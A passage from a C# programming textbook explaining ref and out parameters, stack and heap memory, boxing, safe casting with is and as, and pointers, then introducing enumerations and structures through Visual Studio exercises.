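    doInitialize(out int arg); // declares arg and passes it in a single step
    Console.WriteLine(arg);    // writes '42'
}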
In the next exercise, you will practice using ref parameters.
Use ref parameters
1. Return to the Parameters project in Visual Studio 2017.
2. Display the Pass.cs file in the Code and Text Editor window.
3. Edit the Value method to accept its parameter as a ref parameter.
The Value method should look like this:
class Pass
{
    public static void Value(ref int param)
    {
        param = 42;
    }
    ...
}
4. Display the Program.cs file in the Code and Text Editor window.
5. Uncomment the first four statements. Notice that the third statement of
the doWork method, Pass.Value(i), indicates an error. The error occurs
because the Value method now expects a ref parameter. Edit this
statement so that the Pass.Value method call passes its argument as a ref
parameter.
Note Leave the four statements that create and test the WrappedInt
object as they are.
The doWork method should now look like this:
class Program
{
    static void doWork()
    {
        int i = 0;
        Console.WriteLine(i);
        Pass.Value(ref i);
        Console.WriteLine(i);
        ...
    }
}
6. On the Debug menu, click Start Without Debugging to build and run the
program.
This time, the first two values written to the console window are 0 and
42. This result shows that the call to the Pass.Value method has
successfully modified the argument i.
7. Press the Enter key to close the application and return to Visual Studio
2017.
Note You can use the ref and out modifiers on reference type
parameters as well as on value type parameters. The effect is the same:
the parameter becomes an alias for the argument.
How computer memory is organized
Computers use memory to hold programs that are being executed and the
data that those programs use. To understand the differences between value
and reference types, it is helpful to understand how data is organized in
memory.
Operating systems and language runtimes such as that used by C#
frequently divide the memory used for holding data into two separate areas,
each of which is managed in a distinct manner. These two areas of memory
are traditionally called the stack and the heap. The stack and the heap serve
different purposes, which are described here:
When you call a method, the memory required for its parameters and
its local variables is always acquired from the stack. When the method
finishes (because it either returns or throws an exception), the memory
acquired for the parameters and local variables is automatically
released back to the stack and is available again when another method
is called. Method parameters and local variables on the stack have a
well-defined lifespan: they come into existence when the method starts,
and they disappear as soon as the method completes.
Note Actually, the same lifespan applies to variables defined in
any block of code enclosed by opening and closing curly braces. In
the following code example, the variable i is created when the
body of the while loop starts, but it disappears when the while loop
finishes and execution continues after the closing brace:
while (...)
{
    int i = ...; // i is created on the stack here
    ...
}
// i disappears from the stack here
When you create an object (an instance of a class) by using the new
keyword, the memory required to build the object is always acquired
from the heap. You have seen that the same object can be referenced
from several places by using reference variables. When the last
reference to an object disappears, the memory used by the object
becomes available again (although it might not be reclaimed
immediately). Chapter 14 includes a more detailed discussion of how
heap memory is reclaimed. Objects created on the heap therefore have
a more indeterminate lifespan; an object is created by using the new
keyword, but it disappears only sometime after the last reference to the
object is removed.
Note All value types are created on the stack. All reference types (objects) are created on the heap (although the reference itself is on the stack). Nullable types are still value types, despite being able to hold null; a nullable variable such as int? is an instance of the System.Nullable<T> structure, so it too is created on the stack.
The names stack and heap come from the way in which the runtime
manages the memory:
Stack memory is organized like a stack of boxes piled on top of one
another. When a method is called, each parameter is placed in a box
that is placed on top of the stack. Each local variable is likewise
assigned a box, and these are placed on top of the boxes already on the
stack. When a method finishes, you can think of the boxes being
removed from the stack.
Heap memory is like a large pile of boxes strewn around a room rather
than stacked neatly on top of one another. Each box has a label
indicating whether it is in use. When a new object is created, the
runtime searches for an empty box and allocates it to the object. The
reference to the object is stored in a local variable on the stack. The
runtime keeps track of the number of references to each box.
(Remember that two variables can refer to the same object.) When the
last reference disappears, the runtime marks the box as not in use, and
at some point in the future it will empty the box and make it available.
Using the stack and the heap
Now let’s examine what happens when a method named Method is called:
void Method(int param)
{
    Circle c;
    c = new Circle(param);
    ...
}
Suppose the argument passed into param is the value 42. When the
method is called, a block of memory (just enough for an int) is allocated from
the stack and initialized with the value 42. As execution moves inside the
method, another block of memory big enough to hold a reference (a memory
address) is also allocated from the stack but left uninitialized. This is for the
Circle variable, c. Next, another piece of memory big enough for a Circle
object is allocated from the heap. This is what the new keyword does. The
Circle constructor runs to convert this raw heap memory to a Circle object. A
reference to this Circle object is stored in the variable c. The following
illustration shows the situation:
At this point, you should note two things:
Although the object is stored on the heap, the reference to the object
(the variable c) is stored on the stack.
Heap memory is not infinite. If heap memory is exhausted, the new
operator will throw an OutOfMemoryException exception, and the
object will not be created.
Note The Circle constructor could also throw an exception. If it does, the memory allocated to the Circle object will be reclaimed, the exception will propagate to the caller, and the variable c will never be assigned a reference.
When the method ends, the parameters and local variables go out of
scope. The memory acquired for c and param is automatically released back
to the stack. The runtime notes that the Circle object is no longer referenced
and at some point in the future will arrange for its memory to be reclaimed by
the heap. (See Chapter 14.)
The System.Object class
One of the most important reference types in the .NET Framework is the
Object class in the System namespace. To fully appreciate the significance of
the System.Object class, you need to understand inheritance, which is
described in Chapter 12, “Working with inheritance.” For the time being,
simply accept that all classes are specialized types of System.Object and that
you can use System.Object to create a variable that can refer to any reference
type. System.Object is such an important class that C# provides the object
keyword as an alias for System.Object. In your code, you can use object, or
you can write System.Object—they mean the same thing.
Tip Use the object keyword in preference to System.Object. It’s more
direct, and it’s consistent with other keywords that are synonyms for
classes (such as string for System.String and some others that are
covered in Chapter 9).
In the following example, the variables c and o both refer to the same
Circle object. The fact that the type of c is Circle and the type of o is object
(the alias for System.Object) in effect provides two different views of the
same item in memory.
Circle c;
c = new Circle(42);
object o;
o = c;
The following diagram illustrates how the variables c and o refer to the
same item on the heap.
Boxing
As you have just seen, variables of type object can refer to any item of any
reference type. However, variables of type object can also refer to a value
type. For example, the following two statements initialize the variable i (of
type int, a value type) to 42 and then initialize the variable o (of type object, a
reference type) to i:
int i = 42;
object o = i;
The second statement requires a little explanation to appreciate what is
actually happening. Remember that i is a value type and that it lives on the
stack. If the reference inside o referred directly to i, the reference would refer
to the stack. However, all references must refer to objects on the heap;
creating references to items on the stack could seriously compromise the
robustness of the runtime and create a potential security flaw, so it is not
allowed. Therefore, the runtime allocates a piece of memory from the heap,
copies the value of integer i to this piece of memory, and then refers the
object o to this copy. This automatic copying of an item from the stack to the
heap is called boxing. The following diagram shows the result:
Important If you modify the original value of the variable i, the value
on the heap referenced through o will not change. Likewise, if you
modify the value on the heap, the original value of the variable will not
change.
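A minimal sketch of this behavior:

int i = 42;
object o = i;         // boxes a copy of i on the heap
i = 43;               // changes only the value on the stack
Console.WriteLine(o); // writes '42': the boxed copy is unaffected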
Unboxing
Because a variable of type object can refer to a boxed copy of a value, it’s
only reasonable to allow you to get at that boxed value through the variable.
You might expect to be able to access the boxed int value that a variable o
refers to by using a simple assignment statement such as this:
int i = o;
However, if you try this syntax, you’ll get a compile-time error. If you
think about it, it’s pretty sensible that you can’t use the int i = o; syntax.
After all, o could be referencing absolutely anything and not just an int.
Consider what would happen in the following code if this statement were
allowed:
Circle c = new Circle();
int i = 42;
object o;
o = c; // o refers to a circle
i = o; // what is stored in i?
To obtain the value of the boxed copy, you must use what is known as a
cast. This is an operation that checks whether converting an item of one type
to another is safe before actually making the copy. You prefix the object
variable with the name of the type in parentheses, as in this example:
int i = 42;
object o = i; // boxes
i = (int)o; // compiles okay
The effect of this cast is subtle. The compiler notices that you’ve specified
the type int in the cast. Next, the compiler generates code to check what o
actually refers to at runtime. It could be absolutely anything. Just because
your cast says o refers to an int, that doesn’t mean it actually does. If o really
does refer to a boxed int and everything matches, the cast succeeds, and the
compiler-generated code extracts the value from the boxed int and copies it to
i. (In this example, the boxed value is then stored in i.) This is called
unboxing. The following diagram shows what is happening:
On the other hand, if o does not refer to a boxed int, there is a type
mismatch, causing the cast to fail. The compiler-generated code throws an
InvalidCastException exception at runtime. Here’s an example of an
unboxing cast that fails:
Circle c = new Circle(42);
object o = c; // doesn't box because Circle is a reference variable
int i = (int)o; // compiles okay but throws an exception at runtime
The following diagram illustrates this case:
You will use boxing and unboxing in later exercises. Keep in mind that
boxing and unboxing are expensive operations because of the amount of
checking required and the need to allocate additional heap memory. Boxing
has its uses, but injudicious use can severely impair the performance of a
program. You will see an alternative to boxing in Chapter 17, “Introducing
generics.”
Casting data safely
By using a cast, you can specify that, in your opinion, the data referenced by
an object has a specific type and that it is safe to reference the object by using
that type. The key phrase here is “in your opinion.” The C# compiler will not
check that this is the case, but the runtime will. If the type of object in
memory does not match the cast, the runtime will throw an
InvalidCastException, as described in the preceding section. You should be
prepared to catch this exception and handle it appropriately if it occurs.
However, catching an exception and attempting to recover if the type of
an object is not what you expected it to be is a rather cumbersome approach.
C# provides two more very useful operators that can help you perform
casting in a much more elegant manner: the is and as operators.
The is operator
You can use the is operator to verify that the type of an object is what you
expect it to be, like this:
WrappedInt wi = new WrappedInt();
...
object o = wi;
if (o is WrappedInt)
{
    WrappedInt temp = (WrappedInt)o; // This is safe; o is a WrappedInt
    ...
}
The is operator takes two operands: a reference to an object on the left,
and the name of a type on the right. If the type of the object referenced on the
heap has the specified type, is evaluates to true; otherwise, is evaluates to
false. The preceding code attempts to cast the reference to the object variable
o only if it knows that the cast will succeed.
Another form of the is operator enables you to abbreviate this code by
combining the type check and the assignment, like this:
WrappedInt wi = new WrappedInt();
...
object o = wi;
...
if (o is WrappedInt temp)
{
    ... // Use temp here
}
In this example, if the test for the WrappedInt type is successful, the is
operator creates a new reference variable (called temp), and assigns it a
reference to the WrappedInt object.
The as operator
The as operator fulfills a similar role to is but in a slightly truncated manner.
You use the as operator like this:
WrappedInt wi = new WrappedInt();
...
object o = wi;
WrappedInt temp = o as WrappedInt;
if (temp != null)
{
    ... // Cast was successful
}
Like the is operator, the as operator takes an object and a type as its
operands. The runtime attempts to cast the object to the specified type. If the
cast is successful, the result is returned and, in this example, is assigned to the
WrappedInt variable temp. If the cast is unsuccessful, the as operator
evaluates to the null value and assigns that to temp instead.
There is a little more to the is and as operators than is described here, and
Chapter 12 discusses them in greater detail.
The switch statement revisited
If you need to check a reference against several types, you can use a series of
if…else statements in conjunction with the is operator. The following
example assumes that you have defined the Circle, Square, and Triangle
classes. The constructors take the radius or side length of the geometric shape as the parameter:
Circle c = new Circle(42);     // Circle of radius 42
Square s = new Square(55);     // Square of side 55
Triangle t = new Triangle(33); // Equilateral triangle of side 33
...
object o = s;
...
if (o is Circle myCircle)
{
    ... // o is a Circle, a reference is available in myCircle
}
else if (o is Square mySquare)
{
    ... // o is a Square, a reference is available in mySquare
}
else if (o is Triangle myTriangle)
{
    ... // o is a Triangle, a reference is available in myTriangle
}
As with any lengthy set of if…else statements, this approach can quickly
become cumbersome and difficult to read. Fortunately, you can use the
switch statement in this situation, as follows:
switch (o)
{
    case Circle myCircle:
        ... // o is a Circle, a reference is available in myCircle
        break;
    case Square mySquare:
        ... // o is a Square, a reference is available in mySquare
        break;
    case Triangle myTriangle:
        ... // o is a Triangle, a reference is available in myTriangle
        break;
    default:
        throw new ArgumentException("variable is not a recognized shape");
}
Note that, in both examples (using the is operator and the switch statement), the scope of the variables created (myCircle, mySquare, and myTriangle) is limited to the code inside the corresponding if block or case block.
Note Case selectors in switch statements also support when expressions,
which you can use to further qualify the situation under which the case
is selected. For example, the following switch statement shows case
selectors that match different sizes of geometric shapes:
switch (o)
{
    case Circle myCircle when myCircle.Radius > 10:
        ...
        break;
    case Square mySquare when mySquare.SideLength == 100:
        ...
        break;
    ...
}
Pointers and unsafe code
This section is purely for your information and is aimed at developers
who are familiar with C or C++. If you are new to programming, feel
free to skip this section.
If you have already written programs in languages such as C or C++,
much of the discussion in this chapter concerning object references
might be familiar in that both languages have a construct that provides
similar functionality: a pointer.
A pointer is a variable that holds the address of, or a reference to, an
item in memory (on the heap or the stack). A special syntax is used to
identify a variable as a pointer. For example, the following statement
declares the variable pi as a pointer to an integer:
int *pi;
Although the variable pi is declared as a pointer, it does not actually
point anywhere until you initialize it. For example, to use pi to point to
the integer variable i, you can use the following statements and the
address-of operator (&), which returns the address of a variable:
int *pi;
int i = 99;
...
pi = &i;
You can access and modify the value held in the variable i through
the pointer variable pi like this:
*pi = 100;
This code updates the value of the variable i to 100 because pi points
to the same memory location as the variable i.
One of the main problems that developers learning C and C++
encounter is understanding the syntax used by pointers. The * operator
has at least two meanings (in addition to being the arithmetic
multiplication operator), and there is often great confusion about when
to use & rather than *. The other issue with pointers is that it is easy to
point somewhere invalid or to forget to point somewhere at all, and then
try to reference the data pointed to. The result will be either garbage or
a program that fails with an error because the operating system detects
an attempt to access an illegal address in memory. There is also a whole
range of security flaws in many existing systems resulting from the
mismanagement of pointers; some environments (not Windows) fail to
enforce checks that a pointer does not refer to memory that belongs to
another process, opening up the possibility that confidential data could
be compromised.
Reference variables were added to C# to avoid all these problems. If
you really want to, you can continue to use pointers in C#, but you must
mark the code as unsafe. The unsafe keyword can be used to mark a
block of code or an entire method, as shown here:
public static void Main(string[] args)
{
    int x = 99, y = 100;
    unsafe
    {
        swap(&x, &y);
    }
    Console.WriteLine($"x is now {x}, y is now {y}");
}

public static unsafe void swap(int* a, int* b)
{
    int temp;
    temp = *a;
    *a = *b;
    *b = temp;
}
When you compile programs containing unsafe code, you must
specify the Allow Unsafe Code option when building the project. To do
this, right-click the project in Solution Explorer and then click
Properties. In the Properties window, click the Build tab, select Allow
Unsafe Code, and then, on the File menu, click Save All.
Unsafe code also has a bearing on how memory is managed. Objects
created in unsafe code are said to be unmanaged. Although situations
that require you to access memory in this way are not common, you
might encounter some, especially if you are writing code that needs to
perform some low-level Windows operations.
You will learn about the implications of using code that accesses
unmanaged memory in more detail in Chapter 14.
Summary
In this chapter, you learned about some important differences between value
types that hold their value directly on the stack and reference types that refer
indirectly to their objects on the heap. You also learned how to use the ref
and out keywords on method parameters to gain access to the arguments. You
saw how assigning a value (such as the int 42) to a variable of the
System.Object class creates a boxed copy of the value on the heap and then
causes the System.Object variable to refer to this boxed copy. You also saw
how assigning a variable of a value type (such as an int) from a variable of
the System.Object class copies (or unboxes) the value in the System.Object
class to the memory used by the int.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 9.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To copy a value type variable: Simply make the copy. Because the variable is a value type, you will have two copies of the same value. For example:

int i = 42;
int copyi = i;

To copy a reference type variable: Simply make the copy. Because the variable is a reference type, you will have two references to the same object. For example:

Circle c = new Circle(42);
Circle refc = c;

To declare a variable that can hold a value type or the null value: Declare the variable by using the ? modifier with the type. For example:

int? i = null;

To pass an argument to a ref parameter: Prefix the argument with the ref keyword. This makes the parameter an alias for the actual argument rather than a copy of the argument. The method may change the value of the parameter, and this change is made to the actual argument rather than to a local copy. For example:

static void Main()
{
    int arg = 42;
    doWork(ref arg);
    Console.WriteLine(arg);
}

To pass an argument to an out parameter: Prefix the argument with the out keyword. This makes the parameter an alias for the actual argument rather than a copy of the argument. The method must assign a value to the parameter, and this value is assigned to the actual argument. For example:

static void Main()
{
    int arg;
    doWork(out arg);
    Console.WriteLine(arg);
}

To box a value: Initialize or assign a variable of type object with the value. For example:

object o = 42;

To unbox a value: Cast the object reference that refers to the boxed value to the type of the value variable. For example:

int i = (int)o;

To cast an object safely: Use the is operator to test whether the cast is valid. For example:

WrappedInt wi = new WrappedInt();
...
object o = wi;
if (o is WrappedInt temp)
{
    ...
}

Alternatively, use the as operator to perform the cast, and test whether the result is null. For example:

WrappedInt wi = new WrappedInt();
...
object o = wi;
WrappedInt temp = o as WrappedInt;
if (temp != null)
    ...
CHAPTER 9
Creating value types with
enumerations and structures
After completing this chapter, you will be able to:
Declare an enumeration type.
Create and use an enumeration type.
Declare a structure type.
Create and use a structure type.
Explain the differences in behavior between a structure and a class.
Chapter 8, “Understanding values and references,” covers the two
fundamental types that exist in Microsoft Visual C#: value types and
reference types. Recall that a value type variable holds its value directly on
the stack, whereas a reference type variable holds a reference to an object on
the heap. Chapter 7, “Creating and managing classes and objects,”
demonstrates how to create your own reference types by defining classes. In
this chapter, you’ll learn how to create your own value types.
C# supports two kinds of value types: enumerations and structures. We’ll
look at each of them in turn.
Working with enumerations
Suppose that you want to represent the seasons of the year in a program. You
could use the integers 0, 1, 2, and 3 to represent spring, summer, fall, and
winter, respectively. This system would work, but it’s not very intuitive. If
you used the integer value 0 in code, it wouldn’t be obvious that a particular
0 represented spring. It also wouldn’t be a very robust solution. For example,
if you declare an int variable named season, there is nothing to stop you from
assigning it any legal integer value outside the set 0, 1, 2, or 3. C# offers a
better solution. You can create an enumeration (sometimes called an enum
type) whose values are limited to a set of symbolic names.
Declaring an enumeration
You define an enumeration by using the enum keyword, followed by a set of
symbols identifying the legal values that the type can have, enclosing them
between braces. Here’s how to declare an enumeration named Season whose
literal values are limited to the symbolic names Spring, Summer, Fall, and
Winter:
enum Season { Spring, Summer, Fall, Winter }
Using an enumeration
After you have declared an enumeration, you can use it in the same way you
do any other type. If the name of your enumeration is Season, you can create
variables of type Season, fields of type Season, and parameters of type
Season, as shown in this example:
enum Season { Spring, Summer, Fall, Winter }

class Example
{
    public void Method(Season parameter) // method parameter example
    {
        Season localVariable; // local variable example
        ...
    }

    private Season currentSeason; // field example
}
Before you can read the value of an enumeration variable, it must be
assigned a value. You can assign a value that is defined by the enumeration
only to an enumeration variable, as is illustrated here:
Season colorful = Season.Fall;
Console.WriteLine(colorful); // writes out 'Fall'
Note As you can with all value types, you can create a nullable version
of an enumeration variable by using the ? modifier. You can then assign
the null value, as well as the values defined by the enumeration, to the
variable:
Season? colorful = null;
Notice that you have to write Season.Fall rather than just Fall. All
enumeration literal names are scoped by their enumeration type, which makes
it possible for different enumerations to contain literals with the same name.
Also, notice that when you display an enumeration variable by using
Console.WriteLine, the compiler generates code that writes out the name of
the literal whose value matches the value of the variable. If needed, you can
explicitly convert an enumeration variable to a string that represents its
current value by using the built-in ToString method that all enumerations
automatically contain, as demonstrated in the following example:
string name = colorful.ToString();
Console.WriteLine(name); // also writes out 'Fall'
Many of the standard operators that you can use on integer variables you
can also use on enumeration variables (except the bitwise and shift operators,
which are covered in Chapter 16, “Handling binary data and using indexers”).
For example, you can compare two enumeration variables of the same type
for equality by using the equality operator (==), and you can even perform
arithmetic on an enumeration variable—although the result might not always
be meaningful!
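For instance, here is a minimal sketch of both comparison and arithmetic on the Season enumeration (Spring is 0, Summer 1, Fall 2, Winter 3):

Season s1 = Season.Summer;
Season s2 = Season.Summer;
Console.WriteLine(s1 == s2); // writes 'True'
Season next = s1 + 1;        // arithmetic is allowed...
Console.WriteLine(next);     // writes 'Fall'
Console.WriteLine(s1 + 37);  // ...but writes '38', which matches no Season literal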
Choosing enumeration literal values
Internally, an enumeration type associates an integer value with each element
of the enumeration. By default, the numbering starts at 0 for the first element
and goes up in steps of 1. It’s possible to retrieve the underlying integer value
of an enumeration variable. To do this, you must cast it to its underlying type.
The discussion of unboxing in Chapter 8 explains that casting a type
converts the data from one type to another as long as the conversion is valid
and meaningful. The following code example writes out the value 2 and not
the word Fall (remember, in the Season enumeration, Spring is 0, Summer
1, Fall 2, and Winter 3):
enum Season { Spring, Summer, Fall, Winter }
...
Season colorful = Season.Fall;
Console.WriteLine((int)colorful); // writes out '2'
If you prefer, you can associate a specific integer constant (such as 1) with
an enumeration literal (such as Spring), as in the following example:
enum Season { Spring = 1, Summer, Fall, Winter }
Important The integer value with which you initialize an enumeration
literal must be a compile-time constant value (such as 1).
If you don’t explicitly give an enumeration literal a constant integer value,
the compiler gives it a value that is one greater than the value of the previous
enumeration literal, except for the very first enumeration literal, to which the
compiler gives the default value 0. In the preceding example, the underlying
values of Spring, Summer, Fall, and Winter are now 1, 2, 3, and 4.
You are allowed to give more than one enumeration literal the same
underlying value. For example, in the United Kingdom, fall is referred to as
autumn. You can cater to both cultures as follows:
enum Season { Spring, Summer, Fall, Autumn = Fall, Winter }
Choosing an enumeration’s underlying type
When you declare an enumeration, the enumeration literals are given values
of type int. You can also choose to base your enumeration on a different
underlying integer type. For example, to declare that the underlying type for
Season is a short rather than an int, you can write this:
enum Season : short { Spring, Summer, Fall, Winter }
The main reason for using short is to save memory; an int occupies more
memory than a short, and if you do not need the entire range of values
available to an int, using a smaller data type can make sense.
You can base an enumeration on any of the eight integer types: byte,
sbyte, short, ushort, int, uint, long, or ulong. The values of all the
enumeration literals must fit within the range of the chosen base type. For
example, if you base an enumeration on the byte data type, you can have a
maximum of 256 literals (starting at 0).
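As an illustration, here is a minimal sketch of a byte-based enumeration (the Direction type is invented for this example):

enum Direction : byte { North, East, South, West }
...
Direction d = Direction.West;
Console.WriteLine((byte)d); // writes '3'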
Now that you know how to declare an enumeration, the next step is to use
it. In the following exercise, you will work with a console application to
declare and use an enumeration that represents the months of the year.
Create and use an enumeration
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the StructsAndEnums solution, which is located in the \Microsoft
Press\VCSBS\Chapter 9\StructsAndEnums folder in your Documents
folder.
3. In the Code and Text Editor window, display the Month.cs file.
The source file is empty apart from the declaration of a namespace
called StructsAndEnums and a // TODO: comment.
4. Replace the // TODO: comment with the enumeration named Month
within the StructsAndEnums namespace, as shown in bold in the code
that follows. This enumeration models the months of the year. The 12
enumeration literals for Month are January through December.
namespace StructsAndEnums
{
    enum Month
    {
        January, February, March, April,
        May, June, July, August,
        September, October, November, December
    }
}
5. Display the Program.cs file in the Code and Text Editor window.
As in the exercises in previous chapters, the Main method calls the
doWork method and traps any exceptions that occur.
6. In the Code and Text Editor window, add a statement to the doWork
method to declare a variable named first of type Month and initialize it
to Month.January. Add another statement to write the value of the first
variable to the console.
The doWork method should look like this:
static void doWork()
{
    Month first = Month.January;
    Console.WriteLine(first);
}
Note When you type the period following Month, Microsoft
IntelliSense automatically displays all the values in the Month
enumeration.
7. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds and runs the program. Confirm that the word
January is written to the console.
8. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
9. Add two more statements to the doWork method to increment the first
variable and display its new value to the console, as shown in bold here:
static void doWork()
{
    Month first = Month.January;
    Console.WriteLine(first);
    first++;
    Console.WriteLine(first);
}
10. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds and runs the program. Confirm that the words
January and February are written to the console.
Notice that performing a mathematical operation (such as the increment
operation) on an enumeration variable changes the internal integer value
of the variable. When the variable is written to the console, the
corresponding enumeration value is displayed.
11. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
12. Modify the first statement in the doWork method to initialize the first
variable to Month.December, as shown in bold here:
static void doWork()
{
    Month first = Month.December;
    Console.WriteLine(first);
    first++;
    Console.WriteLine(first);
}
13. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds and runs the program. This time, the word
December is written to the console, followed by the number 12.
Although you can perform arithmetic on an enumeration, if the results of
the operation are outside the range of values defined for the
enumeration, all the runtime can do is interpret the value of the variable
as the corresponding integer value.
14. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
Working with structures
Chapter 8 illustrated that classes define reference types that are always
created on the heap. In some cases, the class can contain so little data that the
overhead of managing the heap becomes disproportionate. In these cases, it is
better to define the type as a structure. A structure is a value type. Because
structures are stored on the stack, as long as the structure is reasonably small,
the memory management overhead is often reduced.
Like a class, a structure can have its own fields, methods, and (with one
important exception discussed later in this chapter) constructors.
Common structure types
You might not have realized it, but you have already used structures in
previous exercises in this book. For example, tuples are actually
examples of the System.ValueTuple structure. Rather more interestingly,
in C#, the primitive numeric types int, long, and float are aliases for the
structures System.Int32, System.Int64, and System.Single, respectively.
These structures have fields and methods, and you can actually call
methods on variables and literals of these types. For example, all these
structures provide a ToString method that can convert a numeric value
to its string representation. The following statements are all legal in C#:
int i = 55;
Console.WriteLine(i.ToString());
Console.WriteLine(55.ToString());
float f = 98.765F;
Console.WriteLine(f.ToString());
Console.WriteLine(98.765F.ToString());
Console.WriteLine((500, 600).ToString()); // (500, 600) is a constant tuple
You don’t see this use of the ToString method often because the
Console.WriteLine method calls it automatically when it is needed. It is
more common to use some of the static methods exposed by these
structures. For example, in earlier chapters, you used the static int.Parse
method to convert a string to its corresponding integer value. What you
are actually doing is invoking the Parse method of the Int32 structure:
string s = "42";
int i = int.Parse(s); // exactly the same as Int32.Parse
These structures also include some useful static fields. For example,
Int32.MaxValue is the maximum value that an int can hold, and
Int32.MinValue is the minimum value that you can store in an int.
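For example, the following statements (a quick illustration rather than part of an exercise) display both limits:

Console.WriteLine(Int32.MaxValue); // displays 2147483647
Console.WriteLine(Int32.MinValue); // displays -2147483648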
The following table shows the primitive types in C# and their
equivalent types in the Microsoft .NET Framework. Notice that the
string and object types are classes (reference types) rather than
structures.
Keyword   Type equivalent   Class or structure
bool      System.Boolean    Structure
byte      System.Byte       Structure
decimal   System.Decimal    Structure
double    System.Double     Structure
float     System.Single     Structure
int       System.Int32      Structure
long      System.Int64      Structure
object    System.Object     Class
sbyte     System.SByte      Structure
short     System.Int16      Structure
string    System.String     Class
uint      System.UInt32     Structure
ulong     System.UInt64     Structure
ushort    System.UInt16     Structure
Declaring a structure
To declare your own structure type, you use the struct keyword followed by
the name of the type and then enclose the body of the structure between
opening and closing braces. Syntactically, the process is similar to declaring a
class. For example, here is a structure named Time that contains three public
int fields named hours, minutes, and seconds:
struct Time
{
public int hours, minutes, seconds;
}
As with classes, making the fields of a structure public is not advisable in
most cases; there is no way to control the values held in public fields. For
example, anyone could set the value of minutes or seconds to a value greater
than 60. A better idea is to make the fields private and provide your structure
with constructors and methods to initialize and manipulate these fields, as
shown in this example:
struct Time
{
private int hours, minutes, seconds;
...
public Time(int hh, int mm, int ss)
{
this.hours = hh % 24;
this.minutes = mm % 60;
this.seconds = ss % 60;
}
public int Hours()
{
return this.hours;
}
}
Note By default, you cannot use many of the common operators on
your own structure types. For example, you cannot use operators such
as the equality operator (==) and the inequality operator (!=) on your
own structure type variables. However, you can use the built-in
Equals() method exposed by all structures to compare structure type
variables, and you can also explicitly declare and implement operators
for your own structure types. The syntax for doing this is covered in
Chapter 22, “Operator overloading.”
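For example, assuming the Time structure shown above (with its three-parameter constructor), the following sketch contrasts the two approaches:

Time start = new Time(12, 30, 0);
Time end = new Time(12, 30, 0);
// bool same = (start == end); // compile-time error: == is not defined for Time
bool same = start.Equals(end); // allowed: every structure inherits Equals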
When you copy a value type variable, you get two copies of the value. In
contrast, when you copy a reference type variable, you get two references to
the same object. In summary, use structures for small data values for which
it’s just as or nearly as efficient to copy the value as it would be to copy an
address. Use classes for more complex data that is too big to copy efficiently.
Tip Use structures to implement simple concepts whose main feature is
their value rather than the functionality that they provide.
Understanding differences between structures and classes
A structure and a class are syntactically similar, but they have a few
important differences. Let’s look at some of these variances:
You can’t declare a default constructor (a constructor with no
parameters) for a structure. The following example would compile if
Time were a class, but because Time is a structure it does not:
struct Time
{
public Time() { ... } // compile-time error
...
}
The reason you can’t declare your own default constructor for a
structure is that the compiler always generates one. In a class, the
compiler generates the default constructor only if you don’t write a
constructor yourself. The compiler-generated default constructor for a
structure always sets the fields to 0, false, or null—just as for a class.
Therefore, you should ensure that a structure value created by the
default constructor behaves logically and makes sense with these default
values. This has some ramifications that you will explore in the next
exercise.
You can initialize fields to different values by providing a nondefault
constructor. However, when you do this, your nondefault constructor
must explicitly initialize all fields in your structure; the default
initialization no longer occurs. If you fail to do this, you’ll get a
compile-time error. For example, although the following example would
compile and silently initialize seconds to 0 if Time were a class, it fails
to compile because Time is a structure:
struct Time
{
private int hours, minutes, seconds;
...
public Time(int hh, int mm)
{
this.hours = hh;
this.minutes = mm;
} // compile-time error: seconds not initialized
}
In a class, you can initialize instance fields at their point of declaration.
In a structure, you cannot. The following example would compile if
Time were a class, but it causes a compile-time error because Time is a
structure:
struct Time
{
private int hours = 0; // compile-time error
private int minutes; private int seconds;
...
}
The following table summarizes the main differences between a structure
and a class.
Question: Is this a value type or a reference type?
    Structure: A structure is a value type.
    Class: A class is a reference type.

Question: Do instances live on the stack or the heap?
    Structure: Structure instances are called values and live on the stack.
    Class: Class instances are called objects and live on the heap.

Question: Can you declare a default constructor?
    Structure: No.
    Class: Yes.

Question: If you declare your own constructor, will the compiler still generate the default constructor?
    Structure: Yes.
    Class: No.

Question: If you don't initialize a field in your own constructor, will the compiler automatically initialize it for you?
    Structure: No.
    Class: Yes.

Question: Are you allowed to initialize instance fields at their point of declaration?
    Structure: No.
    Class: Yes.
There are other differences between classes and structures concerning
inheritance. These differences are covered in Chapter 12, “Working with
inheritance.”
Declaring structure variables
After you have defined a structure type, you can use it in the same way as
you do any other type. For example, if you have defined the Time structure,
you can create variables, fields, and parameters of type Time, as shown in this
example:
struct Time
{
private int hours, minutes, seconds;
...
}
class Example
{
private Time currentTime;
public void Method(Time parameter)
{
Time localVariable;
...
}
}
Note As with enumerations, you can create a nullable version of a
structure variable by using the ? modifier. You can then assign the null
value to the variable:
Time? currentTime = null;
Understanding structure initialization
Earlier in this chapter, you saw how you could initialize the fields in a
structure by using a constructor. If you call a constructor, the various rules
described earlier guarantee that all the fields in the structure will be
initialized:
Time now = new Time();
The following illustration depicts the state of the fields in this structure:
However, because structures are value types, you can also create structure
variables without calling a constructor, as shown in the following example:
Time now;
This time, the variable is created, but its fields are left in their uninitialized
state. The following illustration depicts the state of the fields in the now
variable. Any attempt to access the values in these fields will result in a
compiler error:
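For example, given the Time structure and its Hours method defined earlier in this chapter, the commented line in this sketch would not compile:

Time now;
// Console.WriteLine(now.Hours()); // compile-time error: use of unassigned local variable 'now'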
Note that in both cases, the now variable is created on the stack.
If you’ve written your own structure constructor, you can also use that to
initialize a structure variable. As explained earlier in this chapter, a structure
constructor must always explicitly initialize all its fields. For example:
struct Time
{
private int hours, minutes, seconds;
...
public Time(int hh, int mm)
{
hours = hh;
minutes = mm;
seconds = 0;
}
}
The following example initializes now by calling a user-defined
constructor:
Time now = new Time(12, 30);
The following illustration shows the effect of this example:
It’s time to put this knowledge into practice. In the following exercise,
you will create and use a structure to represent a date.
Create and use a structure type
1. In the StructsAndEnums project, display the Date.cs file in the Code and
Text Editor window.
2. Replace the TODO comment with a structure named Date inside the
StructsAndEnums namespace.
This structure should contain three private fields: one named year of
type int, one named month of type Month (using the enumeration you
created in the preceding exercise), and one named day of type int. The
